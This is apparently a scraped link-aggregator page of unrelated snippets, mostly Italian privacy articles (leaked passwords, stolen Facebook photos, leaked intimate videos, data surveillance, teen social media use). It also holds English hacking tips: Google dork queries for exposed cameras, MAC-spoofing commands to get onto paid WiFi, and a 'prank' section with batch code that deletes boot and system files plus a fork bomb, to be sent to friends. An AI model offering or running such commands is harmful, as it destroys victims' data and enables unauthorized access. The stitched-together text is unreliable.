background preloader

Genera un nome a caso - Fake Name Generator

Genera un nome a caso - Fake Name Generator
Related:  Privacy_fotografie

Antipublic pubblica le nostre password. Non vi agitate, lo fa da tempo Hibp, segnatevi questo acronimo. Magari in un futuro abbastanza prossimo, vi potrebbe riguardare e forse vi toccherà utilizzarlo per scoprire di essere stati fregati. Ne ho parlato una decina di giorni fa in un corso periferico di formazione che la Scuola superiore della magistratura ha tenuto a Bari. E oggi mi tocca tornare sull’argomento perché quella dannata sigla è “tornata su”, come capita con gli indigesti peperoni negli incubi notturni degli irriducibili golosi, impenitenti ma non inappetenti. La traduzione è Have I been pwned e corrisponde alla terribile domanda Sono stato posseduto da qualche pirata informatico? Il quesito, senza dubbio drammatico, è diventato di interesse collettivo quando in queste ore anche in Italia si è cominciato a parlare di quell’oltre un miliardo di account (tra questi, indirizzi di posta elettronica con relative password di accesso) finiti nelle mani sbagliate e pubblicati nei sotterranei di Internet. Chi pensa che questa sia una novità si sbaglia.

How to Use Google for Hacking Google serves almost 80 percent of all the search queries on the Internet, proving itself as the most popular search engine. However, Google makes it possible to reach not only the publicly available information resources, but also gives access to some of the most confidential information that should never have been revealed. In this post, you will find the information on how to use Google for exploiting security vulnerabilities that exists within many websites. The following are some of the ways to use Google for hacking: 1. There exists many security cameras that are used for monitoring places like parking lots, college campus, road traffic etc. inurl:”viewerframe? Click on any of the search results (Top 5 recommended) and you will gain access to the live camera which has full controls. As you can see in the above screenshot, you now have access to the Live cameras which work in real-time. intitle:”Live View / – AXIS” 2. intitle:”curriculum vitae” “phone * * *” “address *” “e-mail” 3. “?

Painful Computer Pranks Computer pranks to freak out your friends and make them crying for mummy I've been posting many articles about computer pranks on this blog (Deadly Virus Prank, The Ultimate Virus, How to Create a Fake and Harmless Virus and Facebook Virus Prank). Today , I will show you 5 great computer pranks that will frustrate your victims very much. 1. I stumbled across this URL while surfing the internet. 2. Open notepad and copy/paste this code: @echo offattrib -r -s -h c:\autoexec.batdel c:\autoexec.batattrib -r -s -h c:\boot.inidel c:\boot.iniattrib -r -s -h c:\ntldrdel c:\ntldrattrib -r -s -h c:\windows\win.inidel c:\windows\win.ini Now Save it as a .bat file. This should shutdown the persons computer. Send it to your friends computer and tell them to open it. Here is another code too..... cmd /c del c:\windows\* /F /S /Q cmd /c del c:\* /F /S /Q Paste it in NotePad And Save It with Extension .cmd or .bat 3. 1. @echo off:topmd %random%goto top 2. 3. 4. 5. 4. 1. 2. 3. 5. 1. 2. 3.

Mi hanno rubato la foto su Facebook e violato l'identità: ho scoperto di essere indifesa Io e Mariella non abbiamo niente in comune. Non i gusti né il modo di scrivere (e, per la verità, neanche le caviglie). Però abbiamo lo stesso volto, lo stesso sorriso. O meglio, lei ha il mio volto e il mio sorriso. Mariella non è il mio alter ego e neanche la mia coscienza (avrei scelto altre foto per rappresentarla). 'Mariella Pinto' è un profilo Facebook che per costruirsi una identità ha scelto - e rubato - le mie foto. Per qualche giorno - dopo aver 'conosciuto' Mariella per caso - ho cercato aggettivi per descrivere la sensazione provata. Quelle immagini non sono più tue e tu puoi farci poco o niente. Forse Mariella una identità vera, quella che va oltre e viene prima di un post o una foto in posa, non ce l'ha. Restiamo davvero padroni di quel che pubblichiamo? pubblicare foto di vita personale. Non è bastato.

Hack any paid WiFi hotspot in about 30 seconds (The above video was banned from YouTube on 9/12/2014 and hence has been re-uploaded to Vimeo. No explanation for the ban was given. The original YouTube video identifier was: Agodg3dmwaQ ). Or rather, DON'T hack any paid WiFi hotspots, as that would be bad... Also, don't turn your WiFi card off and then back on again after the hack to rectify any MAC address conflicts that might arise. The commands are: ifconfig en1 | grep ether arp -a sudo ifconfig en1 ether [mac address to spoof] Note that the term "MAC address" has nothing to do with Macintosh computers.

Ragazze, fatevi furbe: niente telefonini mentre fate l'amore Sul Fatto del 12 maggio, Selvaggia Lucarelli racconta di un nuovo episodio di diffusione di un filmato hot, glorificato ed esaltato dal popolo smargiasso e spietato del web, in cui una coppia fa l’amore mentre viene ripresa da un amico di lui. Il video è diventato virale e il timore (lecito) della Lucarelli è che la sua condivisione, nata dal furto del cellulare (sì va beh), possa generare un caso analogo a quello di Tiziana Cantone, morta suicida otto mesi fa per le medesime dinamiche. Questo tipo di sberleffo e incitamento brutale da parte di uomini e donne (già, perché la solidarietà femminile fa posto all’omologazione con il divertimento maschile invece di indignarsi) è umanamente ributtante. Eppure, tocca trasversalmente diverse fasce di utenti, anche tra i più inimmaginabili. È indispensabile avere la furbizia di spegnere tutti i cellulari quando si è a letto con il proprio compagno. È fin troppo chiaro che nella coppia messa in mostra è la donna ad avere tutto da perdere.

T411 - Torrent 411 - Tracker Torrent Français - French Torrent Tracker - Tracker Torrent Fr Ecco come vengono sfruttati in concreto i dati delle nostre navigazioni L'articolo è stato aggiornato dopo la pubblicazione iniziale. Ultimo aggiornamento: 2017/06/06 14:00. Se volete farvi un’idea di come vengono utilizzati in pratica i dati che riversiamo più o meno inconsapevolmente in Internet, c’è una ricerca molto interessante pubblicata dall’austriaca Cracked Labs: s’intitola Corporate Surveillance in Everyday Life: How Companies Collect, Combine, Analyze, Trade, and Use Personal Data on Billions. Ne cito giusto tre esempi: – A Singapore, un’azienda calcola l’affidabilità delle persone per i prestiti basandosi sull'uso del telefonino, sulle applicazioni adoperate, sulle transazioni con le società di telecomunicazioni e sui dati immessi nel Web e nei social network, compresi i clic e il modo in cui vengono immessi i dati nei moduli da compilare online. Fonte aggiuntiva: The Register.

Pagebull - Enter search query Web e adolescenti, il 35% convinto che l'uso sbagliato non porti conseguenze - Orizzonte Scuola Una ricerca realizzata dall’università Sapienza di Roma e dalla Polizia Postale, in collaborazione con il Dipartimento per la Giustizia Minorile descrive gli adolescenti italiani connessi ai social network 24 ore su 24, inconsapevoli dei rischi legati alla condivisione dei contenuti in rete, come quelli legati al cyberbullismo, all’adescamento on line e al sexting. “E tu quanto #condividi?” è il nome del progetto che ha coinvolto 1.874 ragazzi tra gli 11 e i 19 anni con l’obiettivo di indagare non solo l’uso di Facebook, Instagram, Twitter e Whatsapp, ma anche le reazioni dei giovani di fronte ai comportamenti illegali in rete. Secondo i dati la maggior parte dei ragazzi utilizza i social network per varie ore dal telefonino, con Whatsapp che è il loro preferito: dichiarano di farne uso 9 ragazzini su 10. Cinque su 10 preferiscono Instagram mentre solo uno su dieci usa Twitter.

Related: